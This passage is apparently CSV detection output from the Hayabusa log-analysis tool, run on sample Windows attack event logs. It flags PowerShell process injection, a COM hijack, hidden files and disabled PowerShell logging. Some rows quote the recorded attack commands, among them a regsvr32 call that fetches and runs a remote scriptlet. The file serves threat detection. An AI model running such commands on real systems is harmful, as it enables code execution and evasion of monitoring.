Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:18.833 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Defense Evasion - Unmanaged PowerShell Detected | Image: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management.A#\4b93b6bd71723bed2fa9dd778436dd5e\System.Management.Automation.ni.dll | Process: C:\Windows\System32\notepad.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2840 | PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00 | Hash: SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:18.833 +09:00,IEWIN7,7,medium,Exec,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Execution - jscript9 engine invoked via clsid | Cmd: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js | Process: C:\ProgramData\winpm.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13531 | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: 
SHA1=C537FF2520215555B6E7B1B71C237F73D960BBED,MD5=41B81EF73218EC0EA0EC74F1C4C0F7B1,SHA256=D1B611E6D672AFC5A3D0F443FD8E2618B7416EFE2DD36593E971BF2F027A9AE3,IMPHASH=BFA8DFA346E250F59C0E2F57DAEFD14D",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:50:36.889 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - rare script engine detected | Image: C:\Windows\System32\jscript9.dll | Process: C:\ProgramData\winpm.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=459A1C58B1B478B53734D0E053E8E14A12ACF427,MD5=FD5FFB00810EC3A9BE8D07EBE94CC034,SHA256=EEB182D598CE511C6509A0B94C17B04D9A4F451FCF99381E61B9DA9F224C510A,IMPHASH=E40AA27717F3033220E53410215609D0",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x13531 | PID: 2600 | PGUID: 365ABB72-4612-5CE0-0000-00103D1E2600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 
Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories | Cmd: attrib +h nbtscan.exe | Process: C:\Windows\System32\attrib.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x566cc | PID: 2728 | PGUID: DFAE8213-9310-5CE1-0000-0010EABA0A00 | Hash: SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Evas,Hiding Files with Attrib.exe,,rules/sigma/process_creation/proc_creation_win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-20 03:05:07.719 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | SetValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 1348 | PGUID: 365ABB72-9AD3-5CE1-0000-0010F55C1800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx +2019-05-20 03:05:33.454 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | DeleteValue: 
HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging | Process: C:\Windows\system32\reg.exe | PID: 860 | PGUID: 365ABB72-9AEB-5CE1-0000-0010F0B51800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | Process: C:\Users\IEUser\Downloads\com-hijack.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xc796 | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.463 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\demo.dll | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.463 +09:00,IEWIN7,11,medium,,Rename Common File to DLL 